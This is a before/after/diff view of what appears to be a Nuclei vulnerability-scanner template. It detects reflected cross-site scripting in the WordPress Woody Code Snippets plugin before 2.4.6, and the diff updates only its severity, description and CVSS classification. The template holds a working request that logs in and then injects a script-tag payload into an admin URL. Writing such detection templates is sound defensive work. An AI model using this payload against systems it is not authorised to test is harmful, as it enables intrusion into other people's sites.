vulnerabilities/wordpress/wp-insert-php-xss.yaml (before)
id: wp-insert-php-xss

info:
  name: Woody Code Snippets < 2.4.6 - Cross-Site Scripting
  author: Akincibor,DhiyaneshDk
  severity: medium
  description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting
  reference:
    - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3
  metadata:
    verified: true
  tags: xss,wp,wordpress,authenticated,woody,wpscan,wp-plugin

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'import-wbcr_insert_php&a\"><script>alert(1)</script>"'
          - 'Woody Code Snippets Import'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/wordpress/wp-insert-php-xss.yaml (after)
id: wp-insert-php-xss

info:
  name: WordPress Woody Code Snippets <2.4.6 - Cross-Site Scripting
  author: Akincibor,DhiyaneshDk
  severity: high
  description: WordPress Woody Code Snippets plugin before 2.4.6 contains a cross-site scripting vulnerability. It does not escape generated URLs before outputting them back in an attribute.
  reference:
    - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
  tags: xss,wp,wordpress,authenticated,woody,wpscan,wp-plugin

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'import-wbcr_insert_php&a\"><script>alert(1)</script>"'
          - 'Woody Code Snippets Import'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23

vulnerabilities/wordpress/wp-insert-php-xss.yaml (diff)
@@ -1,12 +1,16 @@
 id: wp-insert-php-xss
 
 info:
-  name: Woody Code Snippets < 2.4.6 - Cross-Site Scripting
+  name: WordPress Woody Code Snippets <2.4.6 - Cross-Site Scripting
   author: Akincibor,DhiyaneshDk
-  severity: medium
-  description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting
+  severity: high
+  description: WordPress Woody Code Snippets plugin before 2.4.6 contains a cross-site scripting vulnerability. It does not escape generated URLs before outputting them back in an attribute.
   reference:
     - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   metadata:
     verified: true
   tags: xss,wp,wordpress,authenticated,woody,wpscan,wp-plugin
@@ -44,3 +48,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/23
